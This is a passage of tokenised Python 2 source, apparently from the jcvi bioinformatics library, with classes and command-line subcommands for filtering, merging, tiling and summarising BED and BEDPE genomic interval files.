sort ( key = self . nullkey ) <EOL> for bs , sb in groupby ( self , key = lambda x : x . seqid ) : <EOL> yield bs , list ( sb ) <EOL> def get_breaks ( self ) : <EOL> simple_bed = self . simple_bed <EOL> for seqid , ranks in groupby ( simple_bed , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> ranks = list ( ranks ) <EOL> yield seqid , ranks [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , ranks [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> class BedpeLine ( object ) : <EOL> def __init__ ( self , sline ) : <EOL> args = sline . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> self . seqid1 = args [ <NUM_LIT:0> ] <EOL> self . start1 = int ( args [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> self . end1 = int ( args [ <NUM_LIT:2> ] ) <EOL> self . seqid2 = args [ <NUM_LIT:3> ] <EOL> self . start2 = int ( args [ <NUM_LIT:4> ] ) + <NUM_LIT:1> <EOL> self . end2 = int ( args [ <NUM_LIT:5> ] ) <EOL> self . accn = args [ <NUM_LIT:6> ] <EOL> self . score = args [ <NUM_LIT:7> ] <EOL> self . strand1 = args [ <NUM_LIT:8> ] <EOL> self . strand2 = args [ <NUM_LIT:9> ] <EOL> self . isdup = False <EOL> @ property <EOL> def innerdist ( self ) : <EOL> if self . seqid1 != self . seqid2 : <EOL> return - <NUM_LIT:1> <EOL> return abs ( self . start2 - self . end1 ) <EOL> @ property <EOL> def outerdist ( self ) : <EOL> if self . seqid1 != self . seqid2 : <EOL> return - <NUM_LIT:1> <EOL> return abs ( self . end2 - self . start1 ) <EOL> @ property <EOL> def is_innie ( self ) : <EOL> return ( self . strand1 , self . strand2 ) == ( '<STR_LIT:+>' , '<STR_LIT:->' ) <EOL> def rc ( self ) : <EOL> self . strand1 = '<STR_LIT:+>' if self . strand1 == '<STR_LIT:->' else '<STR_LIT:->' <EOL> self . strand2 = '<STR_LIT:+>' if self . 
strand2 == '<STR_LIT:->' else '<STR_LIT:->' <EOL> def _extend ( self , rlen , size , start , end , strand ) : <EOL> if strand == '<STR_LIT:+>' : <EOL> end = start + rlen - <NUM_LIT:1> <EOL> if end > size : <EOL> end = size <EOL> start = end - rlen + <NUM_LIT:1> <EOL> else : <EOL> start = end - rlen + <NUM_LIT:1> <EOL> if start < <NUM_LIT:1> : <EOL> start = <NUM_LIT:1> <EOL> end = start + rlen - <NUM_LIT:1> <EOL> return start , end , strand <EOL> def extend ( self , rlen , size ) : <EOL> self . start1 , self . end1 , self . strand1 = self . _extend ( rlen , size , self . start1 , self . end1 , self . strand1 ) <EOL> self . start2 , self . end2 , self . strand2 = self . _extend ( rlen , size , self . start2 , self . end2 , self . strand2 ) <EOL> def __str__ ( self ) : <EOL> args = ( self . seqid1 , self . start1 - <NUM_LIT:1> , self . end1 , <EOL> self . seqid2 , self . start2 - <NUM_LIT:1> , self . end2 , <EOL> self . accn , self . score , self . strand1 , self . strand2 ) <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> @ property <EOL> def bedline ( self ) : <EOL> assert self . seqid1 == self . seqid2 <EOL> assert self . start1 <= self . end2 <EOL> args = ( self . seqid1 , self . start1 - <NUM_LIT:1> , self . end2 , self . accn ) <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> class BedEvaluate ( object ) : <EOL> def __init__ ( self , TPbed , FPbed , FNbed , TNbed ) : <EOL> self . TP = Bed ( TPbed ) . sum ( unique = True ) <EOL> self . FP = Bed ( FPbed ) . sum ( unique = True ) <EOL> self . FN = Bed ( FNbed ) . sum ( unique = True ) <EOL> self . TN = Bed ( TNbed ) . sum ( unique = True ) <EOL> def __str__ ( self ) : <EOL> from jcvi . utils . table import tabulate <EOL> table = { } <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . TP <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . FP <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . FN <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . 
TN <EOL> msg = str ( tabulate ( table ) ) <EOL> msg += "<STR_LIT>" . format ( self . sensitivity * <NUM_LIT:100> ) <EOL> msg += "<STR_LIT>" . format ( self . specificity * <NUM_LIT:100> ) <EOL> msg += "<STR_LIT>" . format ( self . accuracy * <NUM_LIT:100> ) <EOL> return msg <EOL> @ property <EOL> def sensitivity ( self ) : <EOL> if self . TP + self . FN == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return self . TP * <NUM_LIT:1.> / ( self . TP + self . FN ) <EOL> @ property <EOL> def specificity ( self ) : <EOL> if self . TP + self . FP == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return self . TP * <NUM_LIT:1.> / ( self . TP + self . FP ) <EOL> @ property <EOL> def accuracy ( self ) : <EOL> if self . TP + self . FP + self . FN + self . TN == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return ( self . TP + self . TN ) * <NUM_LIT:1.> / ( self . TP + self . FP + self . FN + self . TN ) <EOL> @ property <EOL> def score ( self ) : <EOL> return "<STR_LIT:|>" . join ( ( "<STR_LIT>" . format ( x ) for x in ( self . sensitivity , self . specificity , self . accuracy ) ) ) <EOL> class BedSummary ( object ) : <EOL> def __init__ ( self , bed ) : <EOL> mspans = [ ( x . span , x . accn ) for x in bed ] <EOL> spans , accns = zip ( * mspans ) <EOL> self . mspans = mspans <EOL> self . stats = SummaryStats ( spans ) <EOL> self . nseqids = len ( set ( x . seqid for x in bed ) ) <EOL> self . nfeats = len ( bed ) <EOL> self . total_bases = bed_sum ( bed , unique = False ) <EOL> self . unique_bases = bed_sum ( bed ) <EOL> self . coverage = self . total_bases * <NUM_LIT:1.> / self . unique_bases <EOL> def report ( self ) : <EOL> print >> sys . stderr , "<STR_LIT>" . format ( self . nseqids ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( self . nfeats ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( thousands ( self . unique_bases ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( thousands ( self . total_bases ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . 
format ( self . coverage ) <EOL> print >> sys . stderr , self . stats <EOL> maxspan , maxaccn = max ( self . mspans ) <EOL> minspan , minaccn = min ( self . mspans ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( maxaccn , maxspan ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( minaccn , minspan ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in ( self . nfeats , self . unique_bases ) ) <EOL> def bed_sum ( beds , seqid = None , unique = True ) : <EOL> if seqid : <EOL> ranges = [ ( x . seqid , x . start , x . end ) for x in beds if x . seqid == seqid ] <EOL> else : <EOL> ranges = [ ( x . seqid , x . start , x . end ) for x in beds ] <EOL> unique_sum = range_union ( ranges ) <EOL> raw_sum = sum ( x . span for x in beds ) <EOL> return unique_sum if unique else raw_sum <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , 
'<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def filterbedgraph ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( filterbedgraph . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedgraphfile , cutoff = args <EOL> c = float ( cutoff ) <EOL> fp = open ( bedgraphfile ) <EOL> pf = bedgraphfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> filteredbed = pf + "<STR_LIT>" . format ( cutoff ) <EOL> fw = open ( filteredbed , "<STR_LIT:w>" ) <EOL> nfiltered = ntotal = <NUM_LIT:0> <EOL> for row in fp : <EOL> b = BedLine ( row ) <EOL> ntotal += <NUM_LIT:1> <EOL> if float ( b . accn ) >= c : <EOL> print >> fw , b <EOL> nfiltered += <NUM_LIT:1> <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nfiltered , ntotal ) , cutoff , filteredbed ) ) <EOL> mergeBed ( filteredbed , sorted = True , delim = None ) <EOL> def tiling ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( tiling . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_verbose ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> ov = opts . overlap <EOL> bed = Bed ( bedfile ) <EOL> inf = len ( bed ) <EOL> selected = Bed ( ) <EOL> for seqid , sbed in bed . sub_beds ( ) : <EOL> g = Grouper ( ) <EOL> current = sbed [ <NUM_LIT:0> ] <EOL> for a in sbed : <EOL> g . join ( a ) <EOL> if a . start < current . end - ov : <EOL> g . join ( a , current ) <EOL> if a . end > current . end : <EOL> current = a <EOL> for gbed in g : <EOL> end = max ( x . end for x in gbed ) <EOL> gbed . sort ( key = lambda x : ( x . start , - x . 
end ) ) <EOL> entries = len ( gbed ) <EOL> counts = [ inf ] * entries <EOL> counts [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> traceback = [ - <NUM_LIT:1> ] * entries <EOL> for i , a in enumerate ( gbed ) : <EOL> for j in xrange ( i + <NUM_LIT:1> , entries ) : <EOL> b = gbed [ j ] <EOL> if b . start >= a . end - ov : <EOL> break <EOL> if counts [ i ] + <NUM_LIT:1> < counts [ j ] : <EOL> counts [ j ] = counts [ i ] + <NUM_LIT:1> <EOL> traceback [ j ] = i <EOL> endi = [ i for i , a in enumerate ( gbed ) if a . end == end ] <EOL> last = min ( ( traceback [ i ] , i ) for i in endi ) [ <NUM_LIT:1> ] <EOL> chain = [ ] <EOL> while last != - <NUM_LIT:1> : <EOL> chain . append ( last ) <EOL> last = traceback [ last ] <EOL> chain = chain [ : : - <NUM_LIT:1> ] <EOL> selected . extend ( [ gbed [ x ] for x in chain ] ) <EOL> if opts . verbose : <EOL> print counts <EOL> print traceback <EOL> print chain <EOL> print "<STR_LIT:\n>" . join ( str ( x ) for x in gbed ) <EOL> print "<STR_LIT:*>" * <NUM_LIT:30> <EOL> print "<STR_LIT:\n>" . join ( str ( gbed [ x ] ) for x in chain ) <EOL> print <EOL> tilingbedfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> selected . print_to_file ( filename = tilingbedfile , sorted = True ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( selected ) , tilingbedfile ) ) <EOL> def chain ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( chain . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> sh ( cmd ) <EOL> bed = Bed ( bedfile , sorted = False ) <EOL> newbed = Bed ( ) <EOL> for accn , bb in groupby ( bed , key = lambda x : x . accn ) : <EOL> bb = list ( bb ) <EOL> g = Grouper ( ) <EOL> for a in bb : <EOL> g . 
join ( a ) <EOL> for a , b in pairwise ( bb ) : <EOL> if a . seqid == b . seqid and b . start - a . end < opts . dist : <EOL> g . join ( a , b ) <EOL> data = [ ] <EOL> for p in g : <EOL> seqid = p [ <NUM_LIT:0> ] . seqid <EOL> start = min ( x . start for x in p ) <EOL> end = max ( x . end for x in p ) <EOL> score = sum ( x . span for x in p ) <EOL> data . append ( ( seqid , start - <NUM_LIT:1> , end , accn , score ) ) <EOL> d = max ( data , key = lambda x : x [ - <NUM_LIT:1> ] ) <EOL> newbed . append ( BedLine ( "<STR_LIT:\t>" . join ( str ( x ) for x in d ) ) ) <EOL> newbed . print_to_file ( opts . outfile , sorted = True ) <EOL> def density ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( density . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> bed = Bed ( bedfile ) <EOL> sizes = Sizes ( fastafile ) . mapping <EOL> header = "<STR_LIT>" . split ( ) <EOL> print "<STR_LIT:\t>" . join ( header ) <EOL> for seqid , bb in bed . sub_beds ( ) : <EOL> nfeats = len ( bb ) <EOL> size = sizes [ seqid ] <EOL> ds = nfeats * <NUM_LIT> / size <EOL> print "<STR_LIT:\t>" . join ( str ( x ) for x in ( seqid , nfeats , size , "<STR_LIT>" . format ( ds ) ) ) <EOL> def clr ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( clr . __doc__ ) <EOL> p . set_bedpe ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedpe , ref = args <EOL> if bedpe . endswith ( "<STR_LIT>" ) : <EOL> bedpefile = bedpe . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if need_update ( bedpe , bedpefile ) : <EOL> cmd = "<STR_LIT>" . format ( bedpe ) <EOL> sh ( cmd , outfile = bedpefile ) <EOL> bedpe = bedpefile <EOL> filtered = bedpe + "<STR_LIT>" <EOL> if need_update ( bedpe , filtered ) : <EOL> filter_bedpe ( bedpe , filtered , ref , rc = opts . rc , <EOL> minlen = opts . 
minlen , maxlen = opts . maxlen ) <EOL> rmdup = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , rmdup ) : <EOL> rmdup_bedpe ( filtered , rmdup , dupwiggle = opts . dup ) <EOL> converted = rmdup + "<STR_LIT>" <EOL> if need_update ( rmdup , converted ) : <EOL> fp = open ( rmdup ) <EOL> fw = open ( converted , "<STR_LIT:w>" ) <EOL> for row in fp : <EOL> r = BedpeLine ( row ) <EOL> print >> fw , r . bedline <EOL> fw . close ( ) <EOL> merged = converted + "<STR_LIT>" <EOL> if need_update ( converted , merged ) : <EOL> mergeBed ( converted ) <EOL> def sfa_to_fq ( sfa , qvchar ) : <EOL> fq = sfa . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> fp = must_open ( sfa ) <EOL> fw = must_open ( fq , "<STR_LIT:w>" ) <EOL> total = <NUM_LIT:0> <EOL> for row in fp : <EOL> total += <NUM_LIT:1> <EOL> name , seq = row . split ( ) <EOL> qual = len ( seq ) * qvchar <EOL> print >> fw , "<STR_LIT:\n>" . join ( ( "<STR_LIT:@>" + name , seq , "<STR_LIT:+>" , qual ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( total , fq ) ) <EOL> return fq <EOL> def filter_bedpe ( bedpe , filtered , ref , rc = False , rlen = None , <EOL> minlen = <NUM_LIT> , maxlen = <NUM_LIT> ) : <EOL> tag = "<STR_LIT>" if rc else "<STR_LIT>" <EOL> logging . debug ( "<STR_LIT>" . format ( tag , minlen , maxlen ) ) <EOL> sizes = Sizes ( ref ) . mapping <EOL> fp = must_open ( bedpe ) <EOL> fw = must_open ( filtered , "<STR_LIT:w>" ) <EOL> retained = total = <NUM_LIT:0> <EOL> for row in fp : <EOL> b = BedpeLine ( row ) <EOL> total += <NUM_LIT:1> <EOL> if rc : <EOL> b . rc ( ) <EOL> if not b . is_innie : <EOL> continue <EOL> b . score = b . outerdist <EOL> if not minlen <= b . score <= maxlen : <EOL> continue <EOL> retained += <NUM_LIT:1> <EOL> if rlen : <EOL> b . extend ( rlen , sizes [ b . seqid1 ] ) <EOL> print >> fw , b <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( retained , total ) , filtered ) ) <EOL> fw . 
close ( ) <EOL> def rmdup_bedpe ( filtered , rmdup , dupwiggle = <NUM_LIT:10> ) : <EOL> sortedfiltered = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , sortedfiltered ) : <EOL> sh ( "<STR_LIT>" . format ( filtered , sortedfiltered ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( dupwiggle ) ) <EOL> fp = must_open ( sortedfiltered ) <EOL> fw = must_open ( rmdup , "<STR_LIT:w>" ) <EOL> data = [ BedpeLine ( x ) for x in fp ] <EOL> retained = total = <NUM_LIT:0> <EOL> for seqid , ss in groupby ( data , key = lambda x : x . seqid1 ) : <EOL> ss = list ( ss ) <EOL> for i , a in enumerate ( ss ) : <EOL> if a . isdup : <EOL> continue <EOL> for b in ss [ i + <NUM_LIT:1> : ] : <EOL> if b . start1 > a . start1 + dupwiggle : <EOL> break <EOL> if b . isdup : <EOL> continue <EOL> if a . seqid2 == b . seqid2 and a . start2 - dupwiggle <= b . start2 <= a . start2 + dupwiggle : <EOL> b . isdup = True <EOL> for a in ss : <EOL> total += <NUM_LIT:1> <EOL> if a . isdup : <EOL> continue <EOL> retained += <NUM_LIT:1> <EOL> print >> fw , a <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( retained , total ) , rmdup ) ) <EOL> fw . close ( ) <EOL> def alignextend ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( alignextend . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:100> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_bedpe ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedpe , ref = args <EOL> qvchar = chr ( opts . qv + <NUM_LIT> ) <EOL> pf = bedpe . 
split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> filtered = bedpe + "<STR_LIT>" <EOL> if need_update ( bedpe , filtered ) : <EOL> filter_bedpe ( bedpe , filtered , ref , rc = opts . rc , <EOL> minlen = opts . minlen , maxlen = opts . maxlen , rlen = opts . rlen ) <EOL> rmdup = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , rmdup ) : <EOL> rmdup_bedpe ( filtered , rmdup , dupwiggle = opts . dup ) <EOL> if opts . bedonly : <EOL> return <EOL> bed1 , bed2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( rmdup , ( bed1 , bed2 ) ) : <EOL> sh ( "<STR_LIT>" . format ( rmdup ) , outfile = bed1 ) <EOL> sh ( "<STR_LIT>" . format ( rmdup ) , outfile = bed2 ) <EOL> sfa1 , sfa2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( ( bed1 , bed2 , ref ) , ( sfa1 , sfa2 ) ) : <EOL> for bed in ( bed1 , bed2 ) : <EOL> fastaFromBed ( bed , ref , name = True , tab = True , stranded = True ) <EOL> fq1 , fq2 = pf + "<STR_LIT>" , pf + "<STR_LIT>" <EOL> if need_update ( ( sfa1 , sfa2 ) , ( fq1 , fq2 ) ) : <EOL> for sfa in ( sfa1 , sfa2 ) : <EOL> sfa_to_fq ( sfa , qvchar ) <EOL> def seqids ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( seqids . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:100> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> pf = opts . prefix <EOL> exclude = opts . exclude <EOL> bed = Bed ( bedfile ) <EOL> s = bed . seqids <EOL> if pf : <EOL> s = [ x for x in s if x . startswith ( pf ) ] <EOL> if exclude : <EOL> s = [ x for x in s if not exclude in x ] <EOL> s = s [ : opts . maxn ] <EOL> print "<STR_LIT:U+002C>" . 
join ( s ) <EOL> def juncs ( args ) : <EOL> """<STR_LIT>""" <EOL> from tempfile import mkstemp <EOL> from pybedtools import BedTool <EOL> p = OptionParser ( juncs . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> fh , trimbed = mkstemp ( suffix = "<STR_LIT>" ) <EOL> fw = must_open ( trimbed , "<STR_LIT:w>" ) <EOL> for i , juncbed in enumerate ( args ) : <EOL> bed = Bed ( juncbed , juncs = True ) <EOL> for b in bed : <EOL> ovh = [ int ( x ) for x in b . extra [ - <NUM_LIT:2> ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> b . start += ovh [ <NUM_LIT:0> ] <EOL> b . end -= ovh [ <NUM_LIT:1> ] <EOL> b . accn = "<STR_LIT>" . format ( b . accn , i ) <EOL> b . extra = None <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> sh ( "<STR_LIT>" . format ( trimbed ) ) <EOL> tbed = BedTool ( trimbed ) <EOL> grouptbed = tbed . groupby ( g = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:6> ] , c = <NUM_LIT:5> , ops = [ '<STR_LIT>' ] ) <EOL> cmd = """<STR_LIT>""" <EOL> infile = grouptbed . fn <EOL> sh ( cmd , infile = infile , outfile = opts . outfile ) <EOL> else : <EOL> sort ( [ trimbed , "<STR_LIT>" , opts . outfile ] ) <EOL> os . unlink ( trimbed ) <EOL> def random ( args ) : <EOL> """<STR_LIT>""" <EOL> from random import sample <EOL> from jcvi . formats . base import flexible_cast <EOL> p = OptionParser ( random . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , N = args <EOL> assert is_number ( N ) <EOL> b = Bed ( bedfile ) <EOL> NN = flexible_cast ( N ) <EOL> if NN < <NUM_LIT:1> : <EOL> NN = int ( round ( NN * len ( b ) ) ) <EOL> beds = sample ( b , NN ) <EOL> new_bed = Bed ( ) <EOL> new_bed . extend ( beds ) <EOL> outfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" . 
format ( N ) <EOL> new_bed . print_to_file ( outfile ) <EOL> logging . debug ( "<STR_LIT>" . format ( NN , outfile ) ) <EOL> def filter ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( filter . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> fp = must_open ( bedfile ) <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> minsize , maxsize = opts . minsize , opts . maxsize <EOL> minaccn = opts . minaccn <EOL> minscore = opts . minscore <EOL> total = [ ] <EOL> keep = [ ] <EOL> for row in fp : <EOL> try : <EOL> b = BedLine ( row ) <EOL> except IndexError : <EOL> print >> fw , row . strip ( ) <EOL> continue <EOL> span = b . span <EOL> total . append ( span ) <EOL> if not minsize <= span <= maxsize : <EOL> continue <EOL> if minaccn and int ( b . accn ) < minaccn : <EOL> continue <EOL> if minscore and int ( b . score ) < minscore : <EOL> continue <EOL> print >> fw , b <EOL> keep . append ( span ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( len ( keep ) , len ( total ) ) ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( sum ( keep ) , sum ( total ) ) ) ) <EOL> def make_bedgraph ( bedfile , fastafile ) : <EOL> sizesfile = Sizes ( fastafile ) . filename <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> bedfile = sort ( [ bedfile ] ) <EOL> bedgraph = pf + "<STR_LIT>" <EOL> if need_update ( bedfile , bedgraph ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . 
format ( bedfile , sizesfile ) <EOL> sh ( cmd , outfile = bedgraph ) <EOL> return bedgraph <EOL> def mergebydepth ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( mergebydepth . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:3> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> mindepth = opts . mindepth <EOL> bedgraph = make_bedgraph ( bedfile ) <EOL> bedgraphfiltered = bedgraph + "<STR_LIT>" . format ( mindepth ) <EOL> if need_update ( bedgraph , bedgraphfiltered ) : <EOL> filter ( [ bedgraph , "<STR_LIT>" . format ( mindepth ) , <EOL> "<STR_LIT>" . format ( bedgraphfiltered ) ] ) <EOL> merged = bedgraphfiltered + "<STR_LIT>" <EOL> if need_update ( bedgraphfiltered , merged ) : <EOL> mergeBed ( bedgraphfiltered , sorted = True ) <EOL> def depth ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( depth . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> readsbed , featsbed = args <EOL> fp = open ( featsbed ) <EOL> nargs = len ( fp . readline ( ) . split ( "<STR_LIT:\t>" ) ) <EOL> keepcols = "<STR_LIT:U+002C>" . join ( str ( x ) for x in range ( <NUM_LIT:1> , nargs + <NUM_LIT:1> ) ) <EOL> cmd = "<STR_LIT>" . format ( readsbed , featsbed ) <EOL> cmd += "<STR_LIT>" . format ( keepcols , nargs + <NUM_LIT:2> ) <EOL> sh ( cmd , outfile = opts . outfile ) <EOL> def remove_isoforms ( ids ) : <EOL> """<STR_LIT>""" <EOL> key = lambda x : x . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> iso_number = lambda x : get_number ( x . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] ) <EOL> ids = sorted ( ids , key = key ) <EOL> newids = [ ] <EOL> for k , ii in groupby ( ids , key = key ) : <EOL> min_i = min ( list ( ii ) , key = iso_number ) <EOL> newids . 
